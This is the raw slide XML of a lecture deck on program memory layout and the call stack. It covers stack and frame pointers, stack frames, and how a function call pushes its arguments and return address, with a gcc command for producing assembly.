          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7162800" y="838200"/>
            <a:ext cx="1298575" cy="1600200"/>
            <a:chOff x="1776" y="1152"/>
            <a:chExt cx="1442" cy="2400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5125" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1776" y="1152"/>
              <a:ext cx="1440" cy="72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Text</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5126" name="Rectangle 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1778" y="1872"/>
              <a:ext cx="1440" cy="816"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="33CC33"/>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dirty="0"/>
                <a:t>Data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5127" name="Rectangle 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1778" y="2688"/>
              <a:ext cx="1440" cy="864"/>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dirty="0"/>
                <a:t>Stack</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E883AA49-9052-4D9B-A0E7-DF9DF5BCE6B0}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6147" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="609600"/>
            <a:ext cx="7772400" cy="5791200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Stack is used to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Dynamically allocate the local variables</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>used in functions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Pass parameters to the functions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Return values from the functions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stack Pointer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(SP) points to the top of the stack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The bottom of the stack is at a fixed address.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The stack consists of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Logical Stack Frames</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> that are pushed when calling a function and popped when returning.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Frame Pointer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(FP) points to a fixed location within a frame.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6148" name="Group 7"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7162800" y="838200"/>
            <a:ext cx="1298575" cy="1600200"/>
            <a:chOff x="1776" y="1152"/>
            <a:chExt cx="1442" cy="2400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6149" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1776" y="1152"/>
              <a:ext cx="1440" cy="72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Text</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6150" name="Rectangle 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1778" y="1872"/>
              <a:ext cx="1440" cy="816"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="33CC33"/>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Data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6151" name="Rectangle 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1778" y="2688"/>
              <a:ext cx="1440" cy="864"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>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Stack</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A2291CDD-7457-4B5A-A496-2A10019A5AAE}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="457200"/>
            <a:ext cx="7772400" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Let’s see an example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>example1.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Get the assembly code by</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> –S –o example1.s example1.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7172" name="Object 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2743200" y="3338513"/>
          <a:ext cx="3657600" cy="180975"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s23730" name="WordPad Document" r:id="rId4" imgW="3657600" imgH="180975" progId="WordPad.Document.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="WordPad Document" r:id="rId4" imgW="3657600" imgH="180975" progId="WordPad.Document.1">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="717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3338513"/>
                        <a:ext cx="3657600" cy="18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3" name="Object 11"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2743200" y="3338513"/>
          <a:ext cx="3657600" cy="180975"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s23731" name="WordPad Document" r:id="rId6" imgW="3657600" imgH="180975" progId="WordPad.Document.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="WordPad Document" r:id="rId6" imgW="3657600" imgH="180975" progId="WordPad.Document.1">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="7173"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3338513"/>
                        <a:ext cx="3657600" cy="18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4" name="Object 20">
            <a:hlinkClick r:id="" action="ppaction://ole?verb=1"/>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="777755072"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1905000" y="1262063"/>
          <a:ext cx="5486400" cy="1924050"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s23732" name="Wordpad Document" r:id="rId7" imgW="5486400" imgH="1924560" progId="WordPad.Document.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Wordpad Document" r:id="rId7" imgW="5486400" imgH="1924560" progId="WordPad.Document.1">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="7174" name="Object 20">
                        <a:hlinkClick r:id="" action="ppaction://ole?verb=1"/>
                      </p:cNvPr>
                      <p:cNvPicPr>
                        <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                      </p:cNvPicPr>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId8"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr bwMode="auto">
                      <a:xfrm>
                        <a:off x="1905000" y="1262063"/>
                        <a:ext cx="5486400" cy="192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5" name="Object 21">
            <a:hlinkClick r:id="" action="ppaction://ole?verb=1"/>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="325237575"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4114800" y="5100638"/>
          <a:ext cx="914400" cy="714375"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s23733" name="Wordpad Document" showAsIcon="1" r:id="rId9" imgW="914400" imgH="714240" progId="WordPad.Document.1">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Wordpad Document" showAsIcon="1" r:id="rId9" imgW="914400" imgH="714240" progId="WordPad.Document.1">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="7175" name="Object 21">
                        <a:hlinkClick r:id="" action="ppaction://ole?verb=1"/>
                      </p:cNvPr>
                      <p:cNvPicPr>
                        <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                      </p:cNvPicPr>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId10"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr bwMode="auto">
                      <a:xfrm>
                        <a:off x="4114800" y="5100638"/>
                        <a:ext cx="914400"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10899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fld id="{23BD10EB-AC1D-44E4-A70C-7CD5EC9F040C}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="609600"/>
            <a:ext cx="7772400" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>Calling function is</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>translated into</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>		pushl $3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>		pushl $2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>		pushl $1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>		call function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>Its pushes the 3 arguments backwards into the stack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>The instruction ‘call’ will push the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Instruction Pointer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t> (IP) onto the stack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>We call the saved IP in stack as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Return Address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>(RET), which will be referred after executing the function.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8196" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="2514600"/>
            <a:ext cx="2209800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0099FF"/>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c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8197" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="2057400"/>
            <a:ext cx="2209800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0099FF"/>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b</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8198" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="1600200"/>
            <a:ext cx="2209800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0099FF"/>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a:t>a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8199" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="1143000"/>
            <a:ext cx="2209800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC00"/>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gn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8200" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7086600" y="3200400"/>
            <a:ext cx="860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2400"/>
              <a:t>Stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8201" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="0"/>
            <a:ext cx="11557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2000"/>
              <a:t>Lower</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000"/>
              <a:t>Memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000"/>
              <a:t>addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8202" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="2468563"/>
            <a:ext cx="11557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2000"/>
              <a:t>Higher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000"/>
              <a:t>Memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000"/>
              <a:t>addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8203" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5257800" y="1143000"/>
            <a:ext cx="11430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8204" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4113213" y="914400"/>
            <a:ext cx="11445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anose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="新細明體"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eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800"/>
              <a:t>SP (%esp)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="mystyle">
  <a:themeElements>
    <a:clrScheme name="mystyl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ystyle">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mystyl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ystyl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ystyl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ystyl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ystyl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ystyl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ystyl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Settings\mhwong\Application Data\Microsoft\Templates\mystyle.pot</Template>
  <TotalTime>7218</TotalTime>
  <Words>5233</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>852</Paragraphs>
  <Slides>25</Slides>
  <Notes>20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2</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>幻灯片标题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>25</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="32" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
